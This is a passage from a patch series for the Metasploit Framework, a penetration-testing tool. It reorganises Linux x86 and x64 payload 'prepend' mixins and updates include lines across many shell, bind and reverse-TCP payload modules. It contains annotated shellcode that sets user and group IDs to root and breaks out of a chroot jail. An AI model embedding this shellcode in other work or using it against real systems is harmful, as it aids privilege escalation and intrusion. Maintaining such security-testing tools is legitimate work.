'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x72" + # push 0x72 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # chroot(random) - "\x48\x31\xd2" + # xor rdx,rdx # - "\xb2\xa1" + # mov dl,0xa1 # - "\x48\x89\xd0" + # mov rax,rdx # - "\x0f\x05" + # syscall # + # setgid(0) + 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x6a" + # push 0x6a # + "\x58" + # pop rax # + "\x0f\x05", # syscall # - # build .. (ptr in rdi ) - "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # - "\x56" + # push rsi # - "\x48\x89\xe7" + # mov rdi,rsp # + # setreuid(0, 0) + break chroot + 'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf8" + # mov rax,rdi # + "\xb0\x71" + # mov al,0x71 # + "\x0f\x05" + # syscall # + # generate temp dir name + "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # + "\x56" + # push rsi # + "\x57" + # push rdi # + # mkdir(random,0755) + "\x48\x89\xe7" + # mov rdi,rsp # + "\x66\xbe\xed\x01" + # mov si,0755 # + "\x6a\x53" + # push 0x53 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # - # loop chdir(..) 69 times - # syscall tend to modify rcx can't use loop... - "\x6a\x45" + # push 0x45 # - "\x5b" + # pop rbx # - "\x6a\x50" + # push 0x50 # - "\x58" + # pop rax # - "\x0f\x05" + # syscall # - "\xfe\xcb" + # dec bl # - "\x75\xf7" + # jnz -7 # + # chroot(random) + "\x48\x31\xd2" + # xor rdx,rdx # + "\xb2\xa1" + # mov dl,0xa1 # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + # syscall # - # chroot (.) (which should be /) - "\x6a\x2e" + # push . (0x2e) # - "\x48\x89\xe7" + # mov rdi,rsp # - "\x48\x89\xd0" + # mov rax,rdx # - "\x0f\x05" # syscall # - } - end + # build .. (ptr in rdi ) + "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # + "\x56" + # push rsi # + "\x48\x89\xe7" + # mov rdi,rsp # + + # loop chdir(..) 69 times + # syscall tend to modify rcx can't use loop... + "\x6a\x45" + # push 0x45 # + "\x5b" + # pop rbx # + "\x6a\x50" + # push 0x50 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\xfe\xcb" + # dec bl # + "\x75\xf7" + # jnz -7 # + + # chroot (.) (which should be /) + "\x6a\x2e" + # push . (0x2e) # + "\x48\x89\xe7" + # mov rdi,rsp # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + } # syscall # + end - def appends_map - { - # exit(0) - 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # - "\x6a\x3c" + # push 0x3c # - "\x58" + # pop rax # - "\x0f\x05", # syscall # - } - end + def appends_map + { + # exit(0) + 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 0x3c # + "\x58" + # pop rax # + "\x0f\x05" # syscall # + } end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb index 461d4b8c4fee..2802967d63d5 100644 --- a/lib/msf/core/payload/linux/x86/prepends.rb +++ b/lib/msf/core/payload/linux/x86/prepends.rb @@ -1,117 +1,118 @@ -module Msf - module Payload::Linux::X86::Prepends - def prepends_order - %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] - end +# +# Linux x86 prepends +# +module Msf::Payload::Linux::X86::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] + end - def appends_order - %w[AppendExit] - end - def prepends_map - { - 'PrependFork' => "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x74\x06" + # jz loc_000f # - # loc_0009: - "\x31\xc0" + # xor %eax,%eax # - "\xb0\x01" + # movb $0x1,%al # - "\xcd\x80" + # int $0x80 ; exit # - # loc_000f: - "\xb0\x42" + # movb %0x42,%al # - "\xcd\x80" + # int $0x80 ; setsid # - "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x75\xed", # jnz loc_0009 # + def appends_order + %w[AppendExit] + end - # setresuid(0, 0, 0) - 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xa4" + # movb $0xa4,%al # - "\xcd\x80", # int $0x80 # + def prepends_map + { + 'PrependFork' => "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x74\x06" + # jz loc_000f # + # loc_0009: + "\x31\xc0" + # xor %eax,%eax # + "\xb0\x01" + # movb $0x1,%al # + "\xcd\x80" + # int $0x80 ; exit # + # loc_000f: + "\xb0\x42" + # movb %0x42,%al # + "\xcd\x80" + # int $0x80 ; setsid # + "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x75\xed", # jnz loc_0009 # - # setreuid(0, 0) - 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xa4" + # movb $0xa4,%al # + "\xcd\x80", # int $0x80 # - # setuid(0) - 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x17" + # pushl $0x17 # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setreuid(0, 0) + 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setresgid(0, 0, 0) - 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xaa" + # movb $0xaa,%al # - "\xcd\x80", # int $0x80 # + # setuid(0) + 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x17" + # pushl $0x17 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setregid(0, 0) - 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x47" + # pushl $0x47 # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xaa" + # movb $0xaa,%al # + "\xcd\x80", # int $0x80 # - # setgid(0) - 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x2e" + # pushl $0x2e # - "\x58" + # popl %eax # - "\xcd\x80", # int $0x80 # + # setregid(0, 0) + 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x47" + # pushl $0x47 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - # setreuid(0, 0) = break chroot - 'PrependChrootBreak' => "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - "\x6a\x3d" + # pushl $0x3d # - # build dir str (ptr in ebx) - "\x89\xe3" + # movl %esp,%ebx # - # mkdir(dir) - "\x6a\x27" + # pushl $0x27 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # chroot(dir) - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # build ".." str (ptr in ebx) - "\x31\xc0" + # xorl %eax,%eax # - "\x50" + # pushl %eax # + # setgid(0) + 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x2e" + # pushl $0x2e # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # - "\x66\x68\x2e\x2e" + # pushw $0x2e2e # - "\x89\xe3" + # movl %esp,%ebx # - # loop changing dir - "\x6a\x3d" + # pushl $0x1e # - "\x59" + # popl %ecx # - "\xb0\x0c" + # movb $0xc,%al # - "\xcd\x80" + # int $0x80 # - "\xe2\xfa" + # loop -6 # - # final chroot - "\x6a\x3d" + # pushl $0x3d # - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - } - end + # setreuid(0, 0) = break chroot + 'PrependChrootBreak' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + "\x6a\x3d" + # pushl $0x3d # + # build dir str (ptr in ebx) + "\x89\xe3" + # movl %esp,%ebx # + # mkdir(dir) + "\x6a\x27" + # pushl $0x27 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # chroot(dir) + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # build ".." str (ptr in ebx) + "\x31\xc0" + # xorl %eax,%eax # + "\x50" + # pushl %eax # + "\x66\x68\x2e\x2e" + # pushw $0x2e2e # + "\x89\xe3" + # movl %esp,%ebx # + # loop changing dir + "\x6a\x3d" + # pushl $0x1e # + "\x59" + # popl %ecx # + "\xb0\x0c" + # movb $0xc,%al # + "\xcd\x80" + # int $0x80 # + "\xe2\xfa" + # loop -6 # + # final chroot + "\x6a\x3d" + # pushl $0x3d # + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end - def appends_map - { - # exit(0) - 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x01" + # pushl $0x01 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - } - end + def appends_map + { + # exit(0) + 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x01" + # pushl $0x01 # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } end -end \ No newline at end of file +end From 4565a04510bf476af9532a6c35778bcac7aa13bf Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Tue, 14 Jan 2025 09:31:03 -0500 Subject: [PATCH 10/12] fix(payloads): updating prepend mixin in payloads --- lib/msf/core/payload/linux/bind_tcp.rb | 2 +- lib/msf/core/payload/linux/reverse_tcp_x86.rb | 2 +- lib/msf/core/payload/linux/x64/reverse_sctp.rb | 2 +- lib/msf/core/payload/linux/x64/reverse_tcp.rb | 2 +- modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/armbe/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/armle/adduser.rb | 2 +- modules/payloads/singles/linux/armle/exec.rb | 2 +- modules/payloads/singles/linux/armle/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/armle/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/mipsbe/exec.rb | 1 - modules/payloads/singles/linux/mipsbe/reboot.rb | 1 - modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/mipsle/exec.rb | 1 - modules/payloads/singles/linux/mipsle/reboot.rb | 1 - modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/ppc64/shell_find_port.rb | 2 +- modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/riscv32le/exec.rb | 1 - modules/payloads/singles/linux/riscv32le/reboot.rb | 1 - modules/payloads/singles/linux/riscv64le/exec.rb | 1 - modules/payloads/singles/linux/riscv64le/reboot.rb | 1 - modules/payloads/singles/linux/x64/exec.rb | 2 +- modules/payloads/singles/linux/x64/pingback_bind_tcp.rb | 2 +- modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_bind_tcp.rb | 2 +- .../payloads/singles/linux/x64/shell_bind_tcp_random_port.rb | 2 +- modules/payloads/singles/linux/x64/shell_find_port.rb | 2 +- modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x64/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/adduser.rb | 2 +- modules/payloads/singles/linux/x86/chmod.rb | 2 +- modules/payloads/singles/linux/x86/exec.rb | 2 +- modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb | 2 +- modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/read_file.rb | 2 +- modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb | 2 +- modules/payloads/singles/linux/x86/shell_bind_tcp.rb | 2 +- .../payloads/singles/linux/x86/shell_bind_tcp_random_port.rb | 2 +- modules/payloads/singles/linux/x86/shell_find_port.rb | 2 +- modules/payloads/singles/linux/x86/shell_find_tag.rb | 2 +- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb | 2 +- modules/payloads/stagers/linux/aarch64/reverse_tcp.rb | 1 + modules/payloads/stagers/linux/armle/bind_tcp.rb | 1 + modules/payloads/stagers/linux/armle/reverse_tcp.rb | 1 + modules/payloads/stagers/linux/x64/bind_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/find_tag.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb | 2 +- modules/payloads/stages/linux/x64/shell.rb | 2 +- modules/payloads/stages/linux/x86/shell.rb | 2 +- 57 files changed, 43 insertions(+), 54 deletions(-) diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index 457071059a38..5b8c1a941710 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -13,7 +13,7 @@ module Msf module Payload::Linux::BindTcp include Msf::Payload::TransportConfig - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Payload::Linux::SendUUID # diff --git a/lib/msf/core/payload/linux/reverse_tcp_x86.rb b/lib/msf/core/payload/linux/reverse_tcp_x86.rb index 738645343fe7..f99e08864c23 100644 --- a/lib/msf/core/payload/linux/reverse_tcp_x86.rb +++ b/lib/msf/core/payload/linux/reverse_tcp_x86.rb @@ -12,7 +12,7 @@ module Msf module Payload::Linux::ReverseTcp_x86 include Msf::Payload::TransportConfig - include Msf::Payload::Linux + include Msf::Payload::Linux::X86::Prepends include Msf::Payload::Linux::SendUUID # diff --git a/lib/msf/core/payload/linux/x64/reverse_sctp.rb b/lib/msf/core/payload/linux/x64/reverse_sctp.rb index 1229fe5610b5..ac71bdfccd2f 100644 --- a/lib/msf/core/payload/linux/x64/reverse_sctp.rb +++ b/lib/msf/core/payload/linux/x64/reverse_sctp.rb @@ -12,7 +12,7 @@ module Msf module Payload::Linux::X64::ReverseSctp include Msf::Payload::TransportConfig - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends # # Generate the first stage diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb index 67d94505c583..3f89f68a7144 100644 --- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb @@ -12,7 +12,7 @@ module Msf module Payload::Linux::X64::ReverseTcp include Msf::Payload::TransportConfig - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends # # Generate the first stage diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb index 7c5de45bf0c4..ae0786c10440 100644 --- a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 152 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb index ec1a63195a7b..e8a76d082e13 100644 --- a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 118 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index 58db13ad4f52..2d7d5da0b15e 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -16,7 +16,7 @@ module MetasploitModule CachedSize = 119 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Armle::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index ba4e48c7be0d..896a448e31a4 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -16,7 +16,7 @@ module MetasploitModule CachedSize = 29 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Armle::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index 3152c584709f..ae8779831d41 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 208 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Armle::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 32bcbe2c4301..9ee7eb5dcdbf 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 172 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Armle::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index 85d4c61b7f75..965222627335 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -10,7 +10,6 @@ module MetasploitModule CachedSize = 52 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb index a16cf8ab783a..1b65babdb45c 100644 --- a/modules/payloads/singles/linux/mipsbe/reboot.rb +++ b/modules/payloads/singles/linux/mipsbe/reboot.rb @@ -8,7 +8,6 @@ module MetasploitModule CachedSize = 32 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb index 31e039c93f42..3c490f9a114d 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 232 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 1ef5c4ec2373..cefb61fb45e5 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 184 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index 0b8873ded27f..e1299a814a5f 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -10,7 +10,6 @@ module MetasploitModule CachedSize = 52 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb index 84172e73353a..e533f15f66f7 100644 --- a/modules/payloads/singles/linux/mipsle/reboot.rb +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -8,7 +8,6 @@ module MetasploitModule CachedSize = 32 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index 8850fe020c22..5c411a555618 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 232 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 4ec88cb4e18e..a4c4d105e8eb 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -9,7 +9,6 @@ module MetasploitModule CachedSize = 184 include Msf::Payload::Single - include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index 7f52841110c3..ccc84496b282 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 223 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index d1e046e40c8f..ed1926b7122c 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 171 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index 6b66f8280349..1a22c6d8ff72 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 183 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/riscv32le/exec.rb b/modules/payloads/singles/linux/riscv32le/exec.rb index 59e903ef3b62..922540cf0918 100644 --- a/modules/payloads/singles/linux/riscv32le/exec.rb +++ b/modules/payloads/singles/linux/riscv32le/exec.rb @@ -7,7 +7,6 @@ module MetasploitModule CachedSize = 96 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super( diff --git a/modules/payloads/singles/linux/riscv32le/reboot.rb b/modules/payloads/singles/linux/riscv32le/reboot.rb index 7cd0d94cea61..c3161b3d48c3 100644 --- a/modules/payloads/singles/linux/riscv32le/reboot.rb +++ b/modules/payloads/singles/linux/riscv32le/reboot.rb @@ -7,7 +7,6 @@ module MetasploitModule CachedSize = 32 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super( diff --git a/modules/payloads/singles/linux/riscv64le/exec.rb b/modules/payloads/singles/linux/riscv64le/exec.rb index 7f04eb77820f..9600bb35d27d 100644 --- a/modules/payloads/singles/linux/riscv64le/exec.rb +++ b/modules/payloads/singles/linux/riscv64le/exec.rb @@ -7,7 +7,6 @@ module MetasploitModule CachedSize = 100 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super( diff --git a/modules/payloads/singles/linux/riscv64le/reboot.rb b/modules/payloads/singles/linux/riscv64le/reboot.rb index bd213cb43718..87278a1db75d 100644 --- a/modules/payloads/singles/linux/riscv64le/reboot.rb +++ b/modules/payloads/singles/linux/riscv64le/reboot.rb @@ -7,7 +7,6 @@ module MetasploitModule CachedSize = 40 include Msf::Payload::Single - include Msf::Payload::Linux def initialize(info = {}) super( diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 8475354988d1..c2e6aaf35754 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -8,7 +8,7 @@ module MetasploitModule CachedSize = 44 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb b/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb index 6e9d6fe376c4..6a0847bb720d 100644 --- a/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 109 - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Payload::Single include Msf::Payload::Pingback include Msf::Payload::Pingback::Options diff --git a/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb b/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb index 4ff1b6a6115d..156d84339c31 100644 --- a/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 125 - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Payload::Single include Msf::Payload::Pingback include Msf::Payload::Pingback::Options diff --git a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb index 1f53da6a4728..6084a29688d1 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 94 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index b71f3190561c..d126b9d64f64 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 86 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::X64::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index 5b5945d25ee9..9bd89bf13c81 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ 